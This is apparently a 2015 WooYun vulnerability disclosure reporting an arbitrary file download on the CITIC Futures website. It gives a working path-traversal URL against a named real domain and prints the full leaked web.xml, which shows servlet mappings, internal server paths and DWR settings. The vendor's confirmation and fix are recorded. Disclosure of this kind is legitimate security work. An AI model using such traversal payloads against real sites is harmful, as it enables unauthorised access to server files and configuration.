当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118292

漏洞标题:中信期货主站任意文件下载

相关厂商:citicsf.com

漏洞作者: DloveJ

提交时间:2015-06-05 11:13

修复时间:2015-07-24 15:04

公开时间:2015-07-24 15:04

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:13

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-05: 细节已通知厂商并且等待厂商处理中
2015-06-09: 厂商已经确认,细节仅向厂商公开
2015-06-19: 细节向核心白帽子及相关领域专家公开
2015-06-29: 细节向普通白帽子公开
2015-07-09: 细节向实习白帽子公开
2015-07-24: 细节向公众公开

简要描述:

中信期货!厂商能不能给高rank呢?么么哒

详细说明:

http://www.citicsf.com/download.jsp?fileName=../WEB-INF/web.xml


1.jpg


<?xml version="1.0" encoding="UTF-8"?>
<web-app version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
<jsp-config>
<jsp-property-group>
<url-pattern>*.jspv</url-pattern>
</jsp-property-group>
</jsp-config>

<session-config>
<session-timeout>
60
</session-timeout>
</session-config>
<welcome-file-list>
<welcome-file>index.jsp</welcome-file>
</welcome-file-list>
<filter>
<filter-name>SetCharacterEncodingFilter</filter-name>
<filter-class>struts.annotation.filter.SetCharacterEncodingFilter</filter-class>
</filter>
<filter-mapping>
<filter-name>SetCharacterEncodingFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<context-param>
<param-name>siteName</param-name>
<param-value>中证期货网站</param-value>
</context-param>
<context-param>
<param-name>systemName</param-name>
<param-value>中证期货网站管理系统</param-value>
</context-param>
<context-param>
<param-name>companyName</param-name>
<param-value>中证期货</param-value>
</context-param>
<context-param>
<param-name>systemVersion</param-name>
<param-value>1.0</param-value>
</context-param>
<context-param>
<param-name>pageSize</param-name>
<param-value>20</param-value>
</context-param>
<context-param>
<param-name>citi_website_url</param-name>
<param-value>http://www.citicsf.com/</param-value>
</context-param>
<context-param>
<param-name>citi_website_dir</param-name>
<param-value>D:/zhongzheng/Java/web_www/web/</param-value>
</context-param>
<context-param>
<param-name>citi_website_ext</param-name>
<param-value>.shtml</param-value>
</context-param>

<context-param>
<param-name>log_switch</param-name>
<param-value>1</param-value>
</context-param>

<!-- Tomcat form验证定义 -->
<security-constraint>
<web-resource-collection>
<web-resource-name>WebContent</web-resource-name>
<url-pattern>*.do</url-pattern>
<url-pattern>*.s</url-pattern>
<url-pattern>*.html</url-pattern>
<url-pattern>*.htm</url-pattern>
<url-pattern>*.jsp</url-pattern>
<url-pattern>*.jspf</url-pattern>
<url-pattern>/dwr/*</url-pattern>
</web-resource-collection>
<auth-constraint>
<role-name>manager</role-name>
</auth-constraint>
</security-constraint>
<login-config>
<auth-method>FORM</auth-method>
<realm-name>web</realm-name>
<form-login-config>
<form-login-page>/login.jsp</form-login-page>
<form-error-page>/login_error.jsp</form-error-page>
</form-login-config>
</login-config>
<!-- Struts 和 DWR定义 -->
<servlet>
<servlet-name>action</servlet-name>
<servlet-class>org.apache.struts.action.ActionServlet</servlet-class>
<load-on-startup>2</load-on-startup>
</servlet>
<servlet>
<servlet-name>OctetStreamReader</servlet-name>
<servlet-class>cn.citi.action.OctetStreamReader</servlet-class>
</servlet>
<servlet>
<servlet-name>TreeServlet</servlet-name>
<servlet-class>cn.citi.action.TreeServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>ValidatenumberServlet</servlet-name>
<servlet-class>cn.citi.action.ValidatenumberServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>CheckFormServlet</servlet-name>
<servlet-class>cn.citi.admin.action.CheckFormServlet</servlet-class>
</servlet>
<servlet>
<servlet-name>PwdServlet</servlet-name>
<servlet-class>cn.citi.action.PwdServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>PwdServlet</servlet-name>
<url-pattern>/pwd.v</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>ValidatenumberServlet</servlet-name>
<url-pattern>/validatenumber.v</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>CheckFormServlet</servlet-name>
<url-pattern>/checkform.s</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>TreeServlet</servlet-name>
<url-pattern>/tree.s</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>OctetStreamReader</servlet-name>
<url-pattern>/upload.s</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>action</servlet-name>
<url-pattern>*.do</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>dwr-invoker</servlet-name>
<servlet-class>uk.ltd.getahead.dwr.DWRServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>allowScriptTagRemoting</param-name >
<param-value>true</param-value>
</init-param>
<init-param>
<param-name>crossDomainSessionSecurity</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>3</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>dwr-invoker</servlet-name>
<url-pattern>/dwr/*</url-pattern>
</servlet-mapping>
<error-page>
<error-code>403</error-code>
<location>/login_error2.jsp</location>
</error-page>
<error-page>
<error-code>404</error-code>
<location>/login_error3.jsp</location>
</error-page>
</web-app>

漏洞证明:

能否给个高rank ?

修复方案:

版权声明:转载请注明来源 DloveJ@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-06-09 15:02

厂商回复:

非常感谢!漏洞已处理。

最新状态:

暂无


漏洞评价:

评论